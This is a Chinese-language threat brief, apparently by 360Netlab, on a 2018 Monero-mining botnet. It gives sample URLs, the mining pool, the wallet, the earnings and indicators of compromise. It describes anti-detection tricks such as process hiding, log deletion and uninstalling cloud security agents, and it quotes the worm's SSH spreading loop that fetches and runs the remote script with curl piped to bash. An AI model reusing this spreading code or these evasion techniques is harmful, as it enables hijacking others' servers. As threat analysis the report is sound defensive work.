威胁快讯：一次僵尸挖矿威胁分析 – 作者:360Netlab

友商发布了一个威胁分析 报告，我们阐述一下从我们的角度看到的情况。

核心样本

hxxp://120.55.54.65/a7  

核心样本是个 Linux Shell 文件，后续动作均由该样本完成，包括：

• 挖矿获利
• 确保资源
• 逃避检测
• 横向扩展

挖矿获利

具体的挖矿动作是由下面一组样本完成的：

• hxxps://www.aybc.so/ubuntu.tar.gz
• hxxps://www.aybc.so/debian.tar.gz
• hxxps://www.aybc.so/cent.tar.gz

样本中的挖矿配置如下：

• 矿池地址：xmr-asia1.nanopool.org:14433
• 钱包地址：42im1KxfTw2Sxa716eKkQAcJpS6cwqkGaHHGnnUAcdDhG2NJhqEF1nNRwjkBsYDJQtDkLCTPehfDC4zjMy5hefT81Xk2h7V.v7

查矿池给付记录可知：

• 累计收益：52.403617565491 XMR
• 当前算力：114,030.0 H/s
• 开始时间：2018-02-28 14:30:03
• 最近给付时间：2018-06-26 05:35:36

确保资源

核心模块中为了确保挖矿资源，采取了若干对抗动作，包括：

• 杀进程：杀掉了其他挖矿进程运行，进程关键字包括 xig, cranbery, xmr,stratum,minerd
• 设防火墙规则：为防止竞争者DDG僵尸网络的矿机下载，屏蔽IP地址 165.225.157.157
• 调整hosts：屏蔽了若干矿池，包括 yiluzhuanqian, f2pool, minexmr 等等

逃避检测

核心模块采取了若干动作对抗检测，包括：

• 调整文件时间，逃避 find 检索。使用 /etc/sudoers 文件的时间来对齐自身关键文件时间
• 隐藏进程：调用 libprocesshider ，来自github 上 gianlucaborello 的 libprocesshider项目
• 调整 ld.so.preload：按照友商的说法是隐藏进程
• 调整dns服务器：防止被从dns流量中分析出来，将本地DNS服务器设为 8.8.8.8 和 1.1.1.1
• 对抗阿里云、云镜：调用 aliyun、yunjing的uninstall脚本
• 删除日志和邮件：删除文件包括 /var/log/cron /var/spool/mail/root /var/mail/root

横向扩展

检查本地 ssh 凭证，尝试进一步横向扩展，继续投递核心模块 a7

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then  
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-  hxxp://120.55.54.65/a7 | bash >/dev/null 2>&1 &' & done
fi  

IoC

主要模块

hxxp://120.55.54.65/a7     AS37963 Hangzhou Alibaba Advertising Co.,Ltd.  

挖矿程序

hxxps://www.aybc.so/ubuntu.tar.gz  
hxxps://www.aybc.so/debian.tar.gz  
hxxps://www.aybc.so/cent.tar.gz  

来源：freebuf.com 2018-06-26 15:16:59 by: 360Netlab